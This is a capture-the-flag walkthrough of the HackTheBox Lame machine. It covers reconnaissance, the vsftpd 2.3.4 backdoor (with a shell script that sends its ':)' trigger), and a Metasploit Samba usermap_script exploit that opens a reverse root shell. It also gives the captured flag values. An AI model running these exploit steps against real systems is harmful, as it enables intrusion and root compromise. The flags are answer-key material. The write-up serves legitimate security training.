HackTheBox Lame CTF Walkthrough

This walkthrough demonstrates the full exploitation process for the Lame machine on HackTheBox, from initial reconnaissance to gaining root access, along with key lessons learned.


1. Initial Reconnaissance

The first step in any CTF is to identify open services on the target machine. We used Nmap for a full TCP port scan (-p-) with service/version detection (-sV) and default script scanning (-sC); the SYN scan (-sS) needs raw-socket privileges, hence sudo:

sudo nmap -sS -sV -sC -p- 10.129.145.147 -oN nmap_full_scan

Nmap Scan Results:

  • 21/tcp (FTP) – vsftpd 2.3.4 (Anonymous login allowed)

  • 22/tcp (SSH) – OpenSSH 4.7p1

  • 139/tcp & 445/tcp (Samba) – smbd 3.0.20-Debian, workgroup: WORKGROUP

  • 3632/tcp (distccd) – distccd v1

Key observations:

  • FTP allows anonymous login, but initial exploration did not reveal sensitive files.

  • Samba 3.0.20 falls inside the range (3.0.20 through 3.0.25rc3) affected by the 'username map script' command-execution flaw, CVE-2007-2447, so it is a candidate for remote code execution as root.

  • vsftpd 2.3.4 is the release whose distribution tarball was briefly trojaned with a backdoor: a username containing ':)' makes the server open a root shell listener on tcp/6200. The version string alone does not tell you whether this particular build carries the backdoor or whether that port is reachable.

Service enumeration also revealed general system info: Unix/Linux OS, hostname lame, domain hackthebox.gr.

2. Service Vulnerability Analysis

FTP: vsftpd 2.3.4

Searching for exploits:

searchsploit vsftpd 2.3.4

Results showed the infamous backdoor command execution (exploit/unix/ftp/vsftpd_234_backdoor in Metasploit), but attempts with Metasploit failed. Before discarding a vector like this, confirm by hand what the module is doing: the backdoor fires when a username containing ':)' is sent and then opens a shell listener on tcp/6200, so if that port never becomes reachable the backdoor is absent, patched or filtered, whatever the banner says. This illustrates an important lesson: the presence of a known-vulnerable version string does not guarantee it is the intended attack vector.
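The check described above, written out as a small script. This is an added example, not part of the original walkthrough or of Metasploit: it sends the ':)' username by hand, probes tcp/6200 before and after, and classifies the result so that "port already open", "listener appeared" and "nothing happened" are not confused with each other. It assumes nc (netcat) on the attacking host and uses the walkthrough's target address; pass a different target as the first argument.

```shell
#!/bin/sh
# Added example (not from the original walkthrough): hand verification of the
# vsftpd 2.3.4 backdoor. Assumes nc on the attacking host and the walkthrough's
# target address; pass a different target as the first argument.
TARGET="${1:-10.129.145.147}"

# The trojaned vsftpd 2.3.4 opens a root shell listener on tcp/6200 as soon as a
# USER string contains the two bytes ":)". PASS is sent only to keep the FTP
# dialogue well-formed; the trigger is the username.
vsftpd_trigger_payload() {
    printf 'USER letmein:)\r\nPASS letmein\r\n'
}

# Is tcp/6200 accepting connections right now? (exit 0 = open)
probe_6200() {
    nc -z -w 3 "$TARGET" 6200 >/dev/null 2>&1
}

# Interpret the before/after probe results. A listener on 6200 only proves the
# backdoor if the port was closed before the trigger was sent.
classify_backdoor() {
    before=$1
    after=$2
    if [ "$before" -eq 0 ]; then
        echo "inconclusive: tcp/6200 was already open before the trigger"
    elif [ "$after" -eq 0 ]; then
        echo "backdoor triggered: shell listener reachable on tcp/6200"
    else
        echo "no listener on tcp/6200: backdoor absent, patched, or port filtered"
    fi
}

check_vsftpd_backdoor() {
    probe_6200
    before=$?
    # The backdoored server never answers the login cleanly, so bound the session.
    vsftpd_trigger_payload | nc -w 5 "$TARGET" 21 >/dev/null 2>&1
    sleep 2
    probe_6200
    after=$?
    classify_backdoor "$before" "$after"
}

# Network activity only when explicitly requested, e.g.:
#   RUN_CHECK=1 sh vsftpd_check.sh 10.129.145.147
if [ "${RUN_CHECK:-0}" = "1" ]; then
    check_vsftpd_backdoor
fi
```

If the script reports a listener, connect with nc to the target on port 6200 and run id; if it reports no listener, move on, as the walkthrough did, rather than retrying the Metasploit module with different options.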

Samba: 3.0.20

We also examined Samba exploits:

searchsploit samba 3.0.20

Relevant exploit: Samba 'Username map script' Command Execution (CVE-2007-2447). When the smb.conf option username map script is set, affected Samba versions (3.0.20 through 3.0.25rc3) pass the client-supplied username to a shell without escaping it, so a username containing shell metacharacters executes arbitrary commands; because smbd runs as root, so do those commands. The Metasploit module exploit/multi/samba/usermap_script automates this.


3. Exploiting Samba via Metasploit

  1. Open Metasploit and select the module:

msf6 > use exploit/multi/samba/usermap_script

  2. Configure the module options. RHOSTS is the target; LHOST and LPORT are the attacker's HTB VPN address and the port on which the default reverse-shell payload will call back:

set RHOSTS 10.129.145.147
set LHOST 10.10.14.62
set LPORT 5555

  3. Launch the exploit:

exploit

  4. Successful exploitation resulted in a root shell, since the injected command runs with smbd's privileges:

[*] Command shell session 1 opened
id
uid=0(root) gid=0(root)

4. Capturing Flags

User Flag

Navigating to /home/makis:

cd /home/makis
cat user.txt

Result: bf43559a3fed24e30fe5cbfdafef3c67

Root Flag

From the root shell:

cd /root
cat root.txt

Result: 09a885cf7c8bfbd4d21cbffe69eef798

Both flags were successfully obtained, completing the machine.


5. Lessons Learned

  1. Do not assume the easiest path – Seeing FTP vsftpd 2.3.4 immediately suggested using that exploit, but the actual attack vector was Samba. Premature assumptions can waste time.

  2. Samba version is critical – Exploiting Samba required mapping the exact version string (3.0.20) to the affected range and selecting the matching module. Enumeration tools like smbclient or enum4linux show shares and users, not whether the build is vulnerable; the version-to-flaw lookup is a separate step.

  3. Recon and verification – Always verify service versions and explore multiple vectors rather than focusing on a single “obvious” vulnerability.


Summary

  • Reconnaissance: Nmap scan revealed FTP, SSH, Samba, and distccd services.

  • Service enumeration: FTP and Samba were considered for exploitation.

  • Exploitation: vsftpd exploit failed; Samba usermap_script Metasploit module provided a root shell.

  • Flags captured:

    • User: /home/makis/user.txt

    • Root: /root/root.txt

  • Key Takeaways: Verify service versions, explore multiple vectors, and avoid assumptions.

The Lame machine demonstrates that older services may appear vulnerable, but careful analysis and version-specific exploits are crucial for success.
